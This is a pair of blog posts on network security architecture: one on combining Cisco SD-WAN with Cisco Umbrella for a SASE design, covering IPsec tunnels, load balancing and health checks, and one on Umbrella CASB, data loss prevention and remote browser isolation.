A careful strategy is needed, and I recommend starting with SD-WAN. Specifically, SD-WAN security creates an SD-WAN SASE design. SD-WAN is now mainstream, and cloud security integration is becoming critical, enabling enterprises to evolve to a cloud-based SASE architecture. The SASE Cisco version is called Cisco Umbrella.

**Security SASE**

As organizations have shifted how they connect their distributed workforce to distributed applications in any location, the convergence of networking and cloud security has never been more critical. And that is what security SASE is all about—bringing these two pillars together and enabling them from several cloud-based PoPs.

Designing, deploying, and managing end-to-end network security is essential in today’s constant attacks. Zero Trust SASE lays the foundation for customers to adopt a cloud-delivered policy-based network security service model.

**SD-WAN SASE**

Then, we have Cisco SD-WAN, a cornerstone of the SASE Solution. In particular, Cisco SD-WAN integration with Cisco Umbrella enables networks to access cloud workloads and SaaS applications securely with one-touch provisioning, deployment flexibility, and optimized performance.

We have several flexible options for journeying to SASE Cisco with Cisco SD-WAN. Cisco has a good solution combining Cisco SD-WAN and cloud-native security, Cisco Umbrella, into a single offering that delivers complete protection. We will get to how this integrates in just a moment.

However, to reach this integration point, you must first understand the stage in your SASE journey. Everyone will be at different stages of the SASE journey, with unique networking and security requirements. For example, you may still be at the SD-WAN with on-premises security.

Then, others may be further down the SASE line with SD-WAN and Umbrella SIG integration or even partially at a complete SASE architecture. As a result, there will be a mixture of thick and thin branch site designs.

SASE Network: First steps 

A mix of SASE journey types will be expected, but you need a consistent, unique policy over this SASE deployment mix. Therefore, we must strive for a compatible network and security function anywhere for continuous service. 

As a second stage to consider, most are looking for multi-security services, not just a CASB or a Firewall. A large number of organizations are looking for multi-function cloud security services. Once you move to the cloud, you will increase efficiency and benefit from multi-functional cloud-delivered security services.

SASE Network: Combined all security functions

So, the other initial step to SASE is to combine security services into a cloud-delivered service. All security functions are now delivered from one place, dispersed globally with PoPs. This can be done with Cisco Umbrella, a multi-function security SASE solution.

Cisco Umbrella integrates multiple services to manage protection and has all of this on one platform. Then, you can deploy it to the locations where it is needed. For example, some sites only need the DNS-layer filtering; for others, you may need full CASB and SWGs.

SASE Network: Combine security with networking 

Once we have combined all security functions, we need to integrate networking into security, which requires a flexible approach to meeting multi-cloud at scale. This is where we can introduce SD-WAN as a starting point of convergence. SD-WAN’s benefits are clear: dynamic segmentation, application optimization, cloud networking, integrated analytics, and assurance. So, we are covering technology stacks and how the operations team consumes the virtual overlay features.

Cisco SD-WAN use cases that can help you transform your WAN edge with deeper cloud integration and rapid access to SASE Cisco. So you can have Cisco Umbrella cloud security available from the SD-WAN controller and vice versa. So this is a good starting point.

Secure Access Service Edge

New connectivity structures: Let us rewind for a moment. The concept of Secure Access Service Edge is based on several reasons. Several products can be combined to form an SASE offering. The main reason for SASE is the major shift in the IT landscape.

We have different types of people connecting to the network, using our network to get to the cloud, or there can be direct cloud access. This has driven the requirements for a new security architecture to match these new connectivity structures. Nothing can be trusted, so you need to evolve your connectivity requirements. 

Shift Workflows to the cloud: There has been a shift of workloads moving to the cloud. Therefore, there are better approaches than providing a data center backhaul to users requesting cloud applications. Backhauling to a central data center to access cloud applications is an actual waste of resources.

And should only be used for applications that can’t be placed in the cloud. This will result in increased application latency and unpredictable user experience. However, the cloud drives a significant network architect shift; you should take advantage of this.

SASE Network: New SASE design

Initially, we had a hub-and-spoke architecture with traditional appliances, but we have moved to a design where we deliver network and security capabilities. This puts the Internet at the center, creating a global cloud edge that makes sense for users to access, not just go to central data because it’s there. 

This is the paradigm shift we are seeing with the new SASE architecture. So, users can connect directly to this new cloud edge, the main headquarters can join the cloud edge, and branch offices can connect via SD-WAN to the cloud edge.

So, this new cloud edge contains all data and applications. Then, you can turn the other security and network functions that each cloud edge PoP needs into a suite for the branch site or remote user connecting.

1) The need for DIA

Firstly, most customers want to leverage Direct Internet Access (DIA) circuits because they want the data center to be something other than the aggregation path for most of the traffic going to the cloud. Then, we have complications or requirements for some applications, such as Office 365.

In this case, there is a specific requirement from Microsoft. Such an application can not be subject to the proxy. Office365 demands DIA and should be provided with Azure ExpressRoute, for example.

2) Identity Security

Then, we will consider identity and identity security. We have new endpoints and identities to consider. We must consider multiple contextual factors when determining the risk level of the identity requesting access. Now that the premier has shifted, how do I have complete visibility of the traffic flow and drive consistent identity-driven policy—not just for the user but also for the devices?

3) Also, segmentation. How do you extend your segmentation strategy to the cloud and open up new connectivity models? For segmentation, you want to isolate all your endpoints, and this may include IoT, CCTV, and other devices. 

**Identity Security Technologies**

Multi-factor authentication (MFA) can be used here, and we can combine multiple authentication factors to grant access. This needs to be a continuous process. I’m also a big fan of Just in Time access. Here, we only give access to a particular segment for a specific time. Once that time is up, access is revoked. This certainly reduces the risk of Malware spreading. In addition, you can isolate privileged sessions and use step-up authentication to access critical assets.

Security SASE 

SASE Cisco converges the network, connectivity, and security into a user service. It is an alternative to the traditional on-premises approach to protection. And instead of having separate silos for network and security, SASE unifies networking and security services and delivers edge-to-edge protection.

All-in-one box

SASE is more of a journey to reach than an all-in-one box you can buy and turn on. We know SASE entails Zero Trust Network Access (ZTNA), SD-WAN, CASB, FWaaS, RBI, and SWG, to name a few. 

SASE Effectivity wants to consolidate adequate security and threat protection through a single vendor with a global presence and peering relationships. 

**SASE connectivity: SD-WAN SASE**

Connectivity is where we need to connect users anywhere to applications everywhere. This is where the capabilities of SD-WAN SASE come into play. SD-WAN brings advanced technologies such as application-aware routing, WAN optimization, per-segment topologies, and dynamic tunnels.

**SD-WAN Driving Connectivity** 

Now, we have SD-WAN that can handle the connectivity side of things. Then, we need to move to control based on the security side. Control is required for end-to-end threat visibility and security. So, even though the perimeter has shifted, you still need to follow the zero trust model outside of the traditional boundary. 

Multiple forms of security drive SASE that can bring this control; the main ones are secure web gateways, cloud-delivered firewalls, cloud access security brokers, DNS layer security, and remote browser isolation. We need these network and security central pillars to converge into a unified model, which can be provided as a software-as-a-service model.

**Building the SASE architecture** 

There can be several approaches to forming this architecture. We can have a Virtual Machine (VM) for each of the above services, place it in the cloud, and then call this SASE. However, too many hops between network and security services in the VM design will introduce latency. As a result, we need to have a SASE approach that is born for the cloud. A bunch of VMs for each network and security service is not a scalable approach.

SASE: Microservices Architecture

Therefore, a better approach would be to have a microservices, multi-tenancy container architecture with the flexibility to optimize and scale. Consider the SASE architecture to be cloud-native.

A multitenant cloud-native approach to WAN infrastructure enables SASE to service any edge endpoint, including the mobile workforce, without sacrificing performance or security. It also means the complexities of upgrades, patches, and maintenance are handled by the SASE vendor and abstracted away from the enterprise.

Cisco Umbrella is built on a cloud-native microservices architecture. However, the umbrella does not alone provide SASE; it must be integrated with other Cisco products to provide the SASE architecture. Let’s start with Cisco SD-WAN.

Cisco SD-WAN: Creating SD-WAN SASE

SD-WAN grew in popularity as a more agile and cloud-friendly approach to WAN connectivity. With large workloads shifting to the cloud, SD-WAN gave enterprises a more reliable alternative to Internet-based VPN and a more agile, affordable alternative to MPLS for several use cases.

Underlay – Overlay Network Design

In addition, by abstracting away underlying network transports and enabling a software-defined approach to the WAN, SD-WAN helped enterprises improve network performance and address challenges such as the high costs of MPLS bandwidth and the trombone-routing problem. 

SD-WAN is essential for SASE success and is a crucial building block for SASE. SASE Cannot Deliver Ubiquitous Security without the Safeguards SD-WAN Provides, Including:

  • Enabling Network Address Translation (NAT)
  • Segmenting the network into multiple subnetworks
  • Firewalling unwanted incoming and VLAN-to-VLAN traffic
  • Securing site-to-site/in-tunnel VPN

So, SD-WAN can ride on top of any transport, whether you have an MPLS or internet breakout, and onboard any users and consumption model. This is a good starting point for SASE. Here, we can use SD-WAN embedded security as a starting point for SASE.  

Example: Underlay & Overlay with GRE

SD-WAN Security Stack: SD-WAN SASE

The SD-WAN security stack is entirely consistent on-premises and in the cloud. SD-WAN supports the enterprise firewall, which is layer 7 aware, an intrusion prevention system built on SNORT, URL filtering, advanced malware protection, and SSL proxy.

A container architecture enables everything except the enterprise firewall; automated security templates exist. So, based on the intent, the SD-WAN component of vManage will push the config to the WAN edge so that the security services can be turned on.

And all of this can be done with automated templates from the SD-WAN controller. It configures the Cisco Umbrella from Cisco SD-WAN. What I find helpful about this is the excellent integration between vManage—essentially, streamlining security. There are automated templates in vManage that you can leverage to achieve this functionality in Cisco Umbrella.

Cisco Umbrella: Enabling Security SASE

The next level of the SASE journey would be with Cisco Umbrella. So, we still have the SD-WAN network and security capabilities enabled. An SD-WAN fabric provides a secure connection to connect to Cisco Umbrella, gaining all the benefits of the SD-WAN connecting model, such as auto tunnel and intelligent traffic steering.

This can be combined with Cisco Umbrella’s cloud security capabilities. So, with these two products combined, we are beginning to fill out our defense in the depth layer of security functions. Multiple security features will also work together to strengthen your security posture.

SD-WAN SASE: Connecting the SASE Network 

We use a secure IPsec tunnel for SD-WAN to connect to Cisco Umbrella. An IPsec tunnel is set up to the Cisco Umbrella by pushing the SIG feature template. So, there is no need to set up a tunnel for each WAN edge at the branch.

The IPsec tunnels at the branch are auto-created to the Cisco Umbrella headend. This provides deep integration and automation capabilities between Cisco SD-WAN and Cisco Umbrella. You don’t need to design this; this is done for you.

IPsec Tunnel Capabilities

What type of IPsec capabilities do you have? Remember that each single IPsec tunnel can support 250 Mbps and burst higher if needed. In the case of larger deployments, multiple tunnels can be deployed to support higher capacity. So, active-active tunnels can be created for more power. There is also an excellent high available with this design. You have an IPsec tunnel established to primary Cisco Umbrella PoP.

If this Cisco Umbrella goes down, all the services can be mapped to a secondary Umbrella data center in the same or a different region if needed. It is doubtful that two SASE PoPs will go down in the areas of the same region.

Hybrid Anycast handles the failure to secondary SASE PoP or DR site. You don’t need to design this; it is done automatically for you. So, with this design, Cisco has what is known as a unified deployment template called the “Secure Internet Gateway Template.” 

Active-active tunnels

The Cisco SD-WAN vManage auto-template allows up to 4 active tunnels, operating at 250 Mpbs each from a single device. The Cisco SD-WAN can then ECMP load-balance traffic on each of the tunnels. Eight tunnels can be supported, but only four can be active.

These tunnels are established from a single Public IP address using NAT-T, which opens up various design options. Now, you can have active-active tunnels, weighted load balancing, and flexible traffic engineering with a unique template.

We know that each tunnel supports 250 Mbps. We now support four tunnels with ECMP for increased throughput. These four tunnels can give you 1Gbps from the branch to the Cisco Umbrella headend. So, as a network admin, you can pass 1Gpbs of traffic to the Umbrella SIG to maintain performance. 

IPsec Tunnel configuration 

For weighted load balancing, we can have, let’s say, two tunnels to the Cisco Umbrella with the same weight. These are two DIA circuits with the same bandwidth. So when the importance is confirmed the same for the different ISPs, the traffic will be equally load-balanced. Cisco uses per-flow load balancing and not per-packet load balancing. The Cisco load balancing is done by flow pinning, where a flow is dictated by hashing the four Tuple. 

So, for example, there will be a static route pairing to both tunnels, and the metric will be the same; you can also have an unequal-cost multi-path use case. You may have small branch sites with dual DIA circuits and different bandwidths and entitlements.

Traffic can be steered at 80:20 over the DIA circuits to optimize the WAN. If you had a static route statement, you would see different metrics. 

Example Technology: IPsec

Policy-Based Routing to Cisco Umbrella

You can also have policy-based routing to Cisco Umbrella. This allows you to configure flexible traffic engineering. For example, you would like only specific application traffic from your branch to Umbrella. So, at one branch site, you should send Office 365 or GitHub traffic to Cisco Umbrella; then, at Branch 2, you should send all traffic. This would include all cloud and internet-bound traffic. So we can adopt the use case for each design requirement. 

Policy-based routing to the Cisco Umbrella allows you to select which applications are sent to the Umbrella, limiting what types of traffic are routed to the Umbrella by their presence; here, we are leveraging Deep Packet Inspection (DPI) for application classification within data policy. All of this is based on an app-aware data policy. 

Layer 7 Health check 

You will also want to monitor the IPsec tunnel health during brownouts. An underlying transport issue could cause this. And dynamically influence traffic forwarding based on high-performing tunnels. Here, Cisco has an L7 tracker with a custom SLA that can be used to monitor the tunnel health. The L7 tracker sends an HTTPing request to the Umbrella service API ( service.sig.umbrella.com) to measure RTT latency and then compares this to the user’s configured SLA. If tunnels do not meet the required SLA, they are marked down based on the tracker status. The traffic will then go through the available tunnels.  

SD-WAN and SASE

Summary: SD WAN SASE

In today’s increasingly digital world, businesses constantly seek innovative solutions to enhance network connectivity and security. SD-WAN SASE (Software-Defined Wide Area Network Secure Access Service Edge) is a groundbreaking technology. In this blog post, we delved into the intricacies of SD-WAN SASE, its benefits, and how it is revolutionizing network connectivity.

Section 1: Understanding SD-WAN

SD-WAN, or Software-Defined Wide Area Network, is a virtualized approach to connecting and managing networks. It allows organizations to efficiently connect multiple locations, whether branch offices, data centers, or cloud-based applications. By leveraging software-defined networking principles, SD-WAN offers enhanced agility, performance, and cost savings compared to traditional WAN solutions.

Section 2: Unveiling SASE

SASE, which stands for Secure Access Service Edge, is a transformative concept that combines network security and WAN capabilities into a unified cloud-based architecture. It enables organizations to consolidate networking and security functions, delivering comprehensive protection and improved performance. SASE replaces the traditional hub-and-spoke network model with a more agile and secure architecture.

Section 3: The Synergy of SD-WAN and SASE

When SD-WAN and SASE are combined, the result is a powerful solution that brings together the benefits of both technologies. SD-WAN provides network agility and scalability, while SASE ensures robust security measures are seamlessly integrated into the network. This synergy enables organizations to optimize their network performance while safeguarding against evolving cybersecurity threats.

Section 4: Benefits of SD-WAN SASE

4.1 Enhanced Performance and User Experience: SD-WAN SASE optimizes traffic routing, ensuring applications and data take the most efficient path. It prioritizes critical applications, resulting in improved performance and user experience.

4.2 Simplified Network Management: The unified architecture of SD-WAN SASE simplifies network management by consolidating various functions into a single platform. This streamlines operations and reduces complexity.

4.3 Enhanced Security: With SASE, security functions are natively integrated into the network. This ensures consistent and comprehensive protection across all locations, devices, and users, regardless of their physical location.

4.4 Cost Savings: SD-WAN SASE reduces the reliance on expensive hardware and dedicated security appliances, resulting in cost savings for organizations.

Conclusion:

In conclusion, SD-WAN SASE is transforming the landscape of network connectivity and security. By combining the agility of SD-WAN and the robustness of SASE, organizations can achieve optimal performance, enhanced security, simplified management, and cost savings. Embracing this innovative technology can empower businesses to stay ahead in the ever-evolving digital world.

Cisco Secure Workload

Cisco Umbrella CASB

by Publications

Cisco Umbrella CASB

In today's digital landscape, businesses face numerous security challenges. Protecting sensitive data and ensuring compliance with regulations are top priorities. This is where Cisco Umbrella CASB (Cloud Access Security Broker) comes into play. In this blog post, we will explore the key features and benefits of Cisco Umbrella CASB, and how it empowers organizations to secure their cloud environments effectively.

CASB, short for Cloud Access Security Broker, is a critical component of modern cybersecurity strategies. It provides organizations with visibility and control over cloud services, ensuring data protection and compliance. Cisco Umbrella CASB takes this to the next level, offering a comprehensive solution that covers all aspects of cloud security.

Cisco Umbrella CASB boasts a wide range of features that make it a powerful tool for securing cloud environments. From advanced threat protection to data loss prevention, here are some key features that set it apart:

Cloud Application Visibility: Cisco Umbrella CASB provides detailed visibility into all cloud applications in use within an organization. This allows administrators to identify potential risks and enforce policies to mitigate them effectively.

Threat Detection and Response: With its advanced threat detection capabilities, Cisco Umbrella CASB helps organizations identify and respond to potential security breaches promptly. It leverages machine learning algorithms and behavioral analytics to detect anomalous activities and prevent data exfiltration.

Data Loss Prevention (DLP): Protecting sensitive data is a top priority for organizations. Cisco Umbrella CASB enables granular data loss prevention policies, ensuring that confidential information remains protected throughout its lifecycle in the cloud.

One of the significant advantages of Cisco Umbrella CASB is its seamless integration with existing security infrastructure. It can easily integrate with other Cisco security solutions, such as Cisco Secure Email Gateway and Cisco Advanced Malware Protection, providing a unified approach to cloud security.

Compliance with industry regulations is crucial for organizations across various sectors. Cisco Umbrella CASB offers robust compliance and governance features that help organizations meet regulatory requirements. It provides visibility into user activities, enforces policies, and generates detailed compliance reports.

Cisco Umbrella CASB is a game-changer in the realm of cloud security. Its comprehensive features, seamless integration capabilities, and enhanced compliance and governance make it a go-to solution for organizations seeking to secure their cloud environments effectively. By leveraging the power of Cisco Umbrella CASB, businesses can confidently embrace the cloud while safeguarding their valuable data.

Matt Conran

Highlights: Cisco Umbrella CASB

Understanding Cisco Umbrella CASB

**Understanding the Basics of Cisco Umbrella CASB**

Cisco Umbrella CASB is designed to provide comprehensive security for cloud applications. It acts as an intermediary between cloud service users and providers, ensuring that data and applications are used securely. By offering visibility and control over user activities, it helps organizations mitigate risks associated with unmanaged devices and shadow IT. Its seamless integration into existing security frameworks makes it a preferred choice for IT administrators looking to enhance their cloud security posture.

**Key Features and Capabilities**

One of the standout features of Cisco Umbrella CASB is its ability to provide detailed insight into cloud service usage. It offers real-time monitoring and analytics, allowing organizations to identify potential threats and vulnerabilities quickly. Additionally, the platform supports advanced threat protection, data loss prevention, and compliance management, ensuring that all cloud activities adhere to regulatory standards. These capabilities make Cisco Umbrella CASB a comprehensive solution for businesses looking to secure their cloud environments.

**Implementing Cisco Umbrella CASB in Your Organization**

Deploying Cisco Umbrella CASB is a straightforward process that can significantly enhance your organization’s cloud security. By integrating with existing security tools and systems, it provides a unified approach to managing cloud access and protecting sensitive data. Organizations can customize policies to meet specific security needs, ensuring a tailored approach to risk management and compliance. This flexibility makes Cisco Umbrella CASB an invaluable asset in the quest for secure cloud operations.

Deployment: CASB Solution

CASBs operate using two approaches: Inline CASB solutions reside in the users and service connection path. They may do this through a hardware appliance or an endpoint agent that routes requests through the CASB.

This approach requires the configuration of the network and endpoint devices. However, it provides the advantage of seeing requests before they are sent to the cloud service, allowing the CASB to block submissions that violate policy.

API-based CASB solutions do not interact directly with the user but rather with the cloud provider through the provider’s API. This approach provides direct access to the cloud service and does not require any user device configuration. However, it also does not allow the CASB to block requests that violate policy. As a result, API-based CASBs are limited to monitoring user activity and reporting on or correcting policy violations after the fact.

Key Features and Benefits:

a) Cloud Application Visibility: Cisco Umbrella CASB offers real-time visibility into cloud applications being used within your organization. This enables you to identify shadow IT, assess the risk associated with different applications, and enforce appropriate security policies.

b) Data Loss Prevention: With advanced data loss prevention capabilities, Cisco Umbrella CASB helps prevent unauthorized access, sharing, or leakage of sensitive data. It allows you to define granular policies, monitor data movement, and take proactive measures to mitigate data breaches.

c) Threat Detection and Response: Powered by machine learning and artificial intelligence, Cisco Umbrella CASB proactively detects and blocks threats in real-time. It analyzes user behavior, identifies anomalies, and provides actionable insights to secure your cloud environment against malware, phishing attacks, and other cyber threats.

d) A Platform Approach

We must opt for a platform approach to visibility and control. More specifically, a platform that works in a 3rd party environment. So, for cloud security, this is where secure access service edge (SASE) can assist. In particular, the Cisco version is SASE, or Cisco Umbrella CASB, which comes with various versions depending on your needs. The SASE Cisco umbrella CASB solution has a variety of CASB security functions and CASB tools, Data Loss Prevention (DLP), and Umbrella Remote Browser Isolation (RBI), which can help you better understand and control your environment.

e) Automatic Discovery and Risk Profiling

The manual process involves investigating and mapping traffic patterns, data movement, and usage. For this, we need automatic discovery and risk profiling. It would help if you had visibility into applications, files, and data you may know and those you do not know about. You will be amazed by the number of malicious files and data already in sanctioned applications.

Example Technology: Sensitive Data Protection

Sensitive data protection

Cloud Security Threats

  • Cloud Challenges:

Today’s shared challenge is that organizations need to know what applications they have in their environment. They also need to figure out what to do with specific types of data or how to find users and assign policies to them. These requirements must be met on someone else’s infrastructure, the cloud.

Working in cloud environments, which differ significantly from on-premises, involves significant risks. Could you consider storage? For example, unprotected storage environments pose a much greater security risk in the public cloud than in a private data center.

  • On-premise Data Centers

Within an on-premise private data center, the firewall controls generally restrict direct access to storage, limiting the exposure of an unprotected file to users who already have access to data center systems. On the other hand, an improperly managed storage bucket in the public cloud may be entirely unfiltered for the entire Internet, with only a few clicks by a single person or automated playbooks without role-based access control (RBAC).

Related: For pre-information, you may find the following helpful:

  1. SD WAN SASE
  2. Cisco Secure Firewall
  3. SASE Model
  4. Cisco CloudLock

Cisco Umbrella & SASE

The Role of SASE

The Cisco Umbrella SASE solution offers other security functionality, such as a cloud-delivered Layer 7 Firewall, Secured Web Gateways (SWG), DNS-layer security, SD-WAN, and Thousand Eyes integration for Monitoring and Observability conditions. So, we have the traditional security stack you are familiar with and added enhancements to make it more cloud-friendly. These functionalities are part of a single SASE solution, and you can benefit from a Cisco Umbrella dashboard with API integrations. 

The Cisco Umbrella CASB fulfills a variety of CASB security use cases. The use case for the CASB solution depends on where you are in your SASE and cloud security voyage. For example, if you are interested in blocking Malware and content, then Umbrella DNS filtering would be fine.

Umbrella Security Features:

However, you may be looking for additional security requirements. For example, you will need Data Loss Prevention (DLP), Cloud Access Security Brokers (CASB), and Umbrella Remote Browser Isolation (RBI). In that case, we need to move toward Umbrella SIG, which includes Layer 7 Firewalls. Cisco Umbrella offers several packages ranging from DNS Security Essentials to SIG Advantage. More information can be found here: Cisco Umbrella Packages.

1.**Continuous File Monitoring**

Along with these security features, Cisco Umbrella also has continuous file monitoring. You scan data at rest for any sanctioned application and files within those approved applications that could be malicious. These tools will improve your security posture and protect organizations against cloud-specific risks.

The Cisco Umbrella CASB components take you from the initial Discovery to understanding the Risk to maintaining activity by controlling access to specific applications for certain users and actions.

These security activities are carried out by the Cisco Umbrella’s Data Loss Prevention (DLP), Cloud Access Security Brokers (CASB), and Remote Browser Isolation engines.

2.**Umbrella Remote Browser Isolation**

What is Remote Browser Isolation? Browsing the Internet is a dangerous activity. Unfortunately, there are an abundance of threats. These include malicious Javascript, malvertising, exploit kits, and drive-by downloads. All of these target users who interact with web content via their browsers.

Typically, when a user’s browser is compromised, the attacker achieves access to the machine the browser runs on. However, the bad actors’ target assets are rarely on the first machine they compromise. For this, they will commonly proceed to move throughout the network laterally.

Challenge: Lateral Movements

**Remote Browser Isolation**

Unfortunately, the tool they use to move laterally is often a good sys admin tool, so it can be hard to detect as a security best practice; it’s much better to eliminate the availability of any lateral movements.

However, with Umbrella Remote Browser Isolation (RBI), the remote browser runs in an isolated container in the cloud, thus mitigating the attack surface to an absolute minimum and removing the potential to move laterally.

Therefore, the most sensible thing to do is to isolate the browsing function. With browser isolation technologies, Malware is kept off the end user’s system, reducing the surface area for attack by shifting the risk of attack to the server sessions, which can be reset to a known good state on every new browsing session, tab opened, or URL accessed.

**Redirect Browsings**

Umbrella Remote Browser Isolation protects users from Malware and threats by redirecting browsing to a cloud-based host, which for some is based on a containerized technology. Isolation is achieved by serving web content to users via a remotely spun-up surrogate browser in the cloud.

The Umbrella Remote Browser Isolation allows users to access whatever content they want, such as a web location or document. The user is sent via an isolation engine, which strips away anything that can be malicious, such as Macros or Malware, and then gives them a fully rendered version of the content.

**Rendered Clean Version**

For example, this could be a web app or a website. With remote browser isolation, you scrub away anything that could be malicious and give it a rendered clean version.

So, to the user, it is fully transparent, and they have no idea that they are looking at a rendered version. However, it provides clean and safe content that will not introduce malware into the environment without a performance hit.

Example: Detecting Threats in Logs

Understanding syslog and auth.log

Syslog is a standard protocol for message logging, allowing devices to send log messages to a centralized server. Auth.log, on the other hand, Auth.log is a specific log file that records authentication-related events on Unix-like systems. Familiarizing ourselves with these logs is the first step toward effective security event detection.

Syslog messages can provide valuable insights into security events. By examining their content and structure, we can identify anomalies, such as repeated failed login attempts, suspicious network connections, or unexpected system reboots. Various log analysis tools, like Splunk and ELK stack, offer powerful features to aid this process.

Auth.log is a goldmine for detecting potential security breaches. This log file captures authentication-related events, such as successful logins, failed login attempts, and user privilege escalations. By carefully monitoring auth.log, security analysts can spot unauthorized access attempts, brute-force attacks, or unusual user behavior, enabling them to take timely action to mitigate potential threats.

Starting Cisco Umbrella CASB

You can use Cisco Umbrella CASB to discover your actual usage of cloud services through multiple means, such as network monitoring, integration with existing network gateways and monitoring tools or even monitoring Domain Name System (DNS) queries. The CASB solution provides this form of discovery service.

This is the first step to CASB security, understanding both sanctioned and shadow I.T. Once the different services are discovered, a CASB solution can monitor activity on approved services through two standard deployment options.

First, we have an API connection or inline (man-in-the-middle) interception. Some vendors offer a multimode approach. Both deployment modes have their advantages and disadvantages.

The CASB alone is far from a silver bullet and works in combination with other security functions. The power of Cisco Umbrella CASB depends on its Data Loss Prevention (DLP) capabilities, which can be either part of the CASB solution or an external service, depending on the CASB security vendor’s capabilities. The Cisco Umbrella has an inline DLP engine.

Data Loss Prevention

After the Discovery is performed, CASB security can be used as a preventative control to block access to SaaS products. This functionality, however, is being quickly replaced through the integration of DLP. DLP systems inspect network traffic, leaving your systems looking for sensitive data. Traffic carrying unauthorized data is terminated to protect it from loss and leakage.

Through integration with a DLP service, you can continue to allow access to a SaaS product but control what is being done within that SaaS product. For example, if somebody uses Twitter, you can restrict specific keywords or statements from being sent to the platform.

So, for example, if you’re using an application like Salesforce in the cloud and have a policy that you’re not allowed to copy customers or download customer databases from Salesforce, the CASB solution can enforce that and monitor if someone attempts to download or violate the policies.

Example Technology: IPS IDS

Suricate IPS/IDS has a range of powerful features, making it a formidable defense mechanism for your network. Some of its notable features include:

1. Intrusion Detection: Suricate continuously scans network traffic, analyzing it for any signs of malicious behavior or suspicious activities. It can identify various attacks, such as DDoS attacks, SQL injections, and malware intrusions.

2. Intrusion Prevention: Suricate IPS is a proactive shield that prevents potential threats from infiltrating your network. It can block malicious packets, unauthorized access attempts, and suspicious traffic patterns, effectively neutralizing potential risks.

3. Real-time Alerting: Suricate instantly alerts network administrators or security teams whenever it detects a potential threat. These alerts provide valuable insights and allow for immediate response and mitigation, minimizing the impact of an attack.

Cisco Umbrella CASB: SASE Capabilities

Cisco Umbrella’s CASB, DLP, and Umbrella remote browser isolation (RBI) offering is a core part of Cisco’s overall SASE strategy. The value of CASB security is from its capability to give insight into cloud application use across cloud platforms and identify unsanctioned use.

CASBs use auto-discovery to detect cloud applications and identify high-risk applications and users. In addition, they include DLP functionality and the capability to detect and provide alerts when abnormal user activity occurs to help stop internal and external threats. This enables Cisco Umbrella to expose shadow I.T. by providing the capability to detect and report on the cloud applications used across your environment.

Now, we have a central place for all applications. Cisco Umbrella CASB looks at all your cloud applications and puts them in a single box, on a single pane of glass, that you can manage and look at what’s happening, but that functionality has to exist already. So, instead of going to a hundred different applications and cloud providers, you just go to one system, and your CASB solution handles everything.

Pillar1: Visibility 

The CASB security should detect all cloud services, assign each a risk ranking, and identify all users and third-party apps able to log in. More often than there are a lot of power users, such as finance, that have access to large data sets. So, files are shared and exposed within the content of files used, and apps are installed.

This is generally due to a slight majority of users controlling most applications. So, these users, who are a small number, introduce a considerable amount of security risk. In addition, these users often collaborate with several external parties, which will be cloud-based sharing, not to mention sharing with non-corporate email addresses.

**A key point: Understanding risk**

The first thing you want to do is understand the risk. Here, you can identify risky applications by gaining visibility on any shadow I.T. These apps that admins have no control or visibility into are being used in their environment that they need to protect.

You can also investigate what identities use these applications and why they are used. How do you gain visibility? You may wonder how you get all this data. A few sources can be used to discover the data we will discuss.

Applications in your environment can be displayed in different categories and break down risk based on other criteria. For example, there is business risk, usage risk, and vendor compliance. Each risk category has different factors used to make up the risk categories. Cisco Umbrella CASB integrates with Cisco Talos, which helps you get the reputation information by looking at the Host domain and URL associated with informing you if the app has a good reputation.

Pillar2: Discovery 

To gain visibility, we have to perform Discovery. The discovery process involves pulling in and logging data out of other security products and then analyzing the information. All of the capabilities to discover apps work out of the box. You only need to set the user traffic to the Umbrella system. The first is DNS, which we can also discover with the Secure Web Gateway (SWG) proxy and a cloud-delivered firewall.

These SASE engines offer a unique view of sanctioned and unsanctioned applications. So, if you send traffic through one of these Cisco Umbrella engines, it can collect this data automatically. Also, Cisco Umbrella has a Layer 7 application Firewall that can provide information such as application protocols, giving you information on the top-used protocols per application.

Native proxy, Firewall, and DNS logs.

The Umbrella has several components of engines that help with Discovery, such as native proxy, Firewall, and DNS logs. So, the user can be determined when every engine picks up the traffic, such as DNS or Firewall levels. This will give you a holistic view of the application, such as the risk associated with it and the identity on a per-app basis. So, now we can have a broader look at risk to understand cloud apps and traffic going to, for example, Malware hosts and going C&C command servers, and if any ToR endpoints are running on your network. 

Pillar 3: Data Security and Control

When dealing with any systematic issue, prevention is critical, with a focus on data protection. A good start would be to define which applications are risky. From there, you can build a workflow and data sets that you need to protect from, for example, data leakage. Once Discovery is performed along with risk assessment, you can prevent unwanted applications in your environment, which is the first step in enforcement.

The first component is the CASB security, followed by DLP to enforce controls. We are creating DLP policies to prevent data leakage. The CASB should be able to identify and control sensitive information. So here, we have DLP features and the capability to respond to classification labels on content.

There is a component called granular control, in which you can allow access to special applications but control different actions for specific applications and users. For example, you can enable access to the app but block uploads.

You can then tie this to an identity so only your finance team can upload it. You can allow, secure, and also isolate. The CASB DLP can operate natively and in conjunction with enterprise DLP products via Internet Content Adaptation Protocol (ICAP) or REST API integration. 

A standard DLP engine for the on-premise and cloud locations will eliminate policy duplication. This Cisco Umbrella solution opts for an inline DLP engine without the need to service chain to an additional appliance.

Pillar 4: Inline Data Loss Prevention

The Data Loss Prevention policy monitors content classified as personally identifiable or sensitive information. When necessary, content is blocked from an upload or a post. With Cisco DLP, there is only one data loss prevention policy.

Rules are added to the policy to define what traffic to monitor (identities and destinations), the data classifications required, and whether content should be blocked or only monitored. For example, an office may want to monitor its network for file uploads that include credit card numbers because the uploads breach company privacy and security policies. A rule that scans the network and uploads to domains can block these files.

Cisco Umbrella: 80 pre-built data Identifiers

There are two primary functions of DLP. The first piece identifies and classifies sensitive data; the second is the actions to take. Cisco Umbrella has robust DLP classification with over 80 pre-built data identifiers that are aligned with detailed reporting on every DLP report. So, working with DLP, you have first to select data classification.

This is where you start your DLP and have different identities for the data. If you are concerned with financial data sets and want to examine credit card numbers, you can choose a list of predicted identifiers. Then, you can add your customizations.

Cisco umbrella DLP engine also supports regular expressions that support pattern patterns. This allows you to match any pattern. So we have a custom action and pre-built and then apply this to a DLP policy. As you know, there is only one data loss prevention policy.

Rules are added to the policy to define what traffic to monitor (identities and destinations), the data classifications required, and whether content should be blocked or only monitored.

**Starting a SASE Project**

A) – SASE DLP Starting Points

As a starting point, when considering DLP, there are a couple of best practices to follow. First, you must “train” a DLP to understand sensitive data and what is not. Especially with DLP, you should have it in monitoring-only mode and not be aggressive and block. You want to understand what is happening before you start to block.

Sometimes, you want to understand more about data and data ID and where it moves. Second, a DLP cannot inspect encrypted traffic; if it does, check the performance hit. Third, some cloud SDKs and APIs may encrypt portions of data and traffic, which will interfere with the success of a DLP implementation.
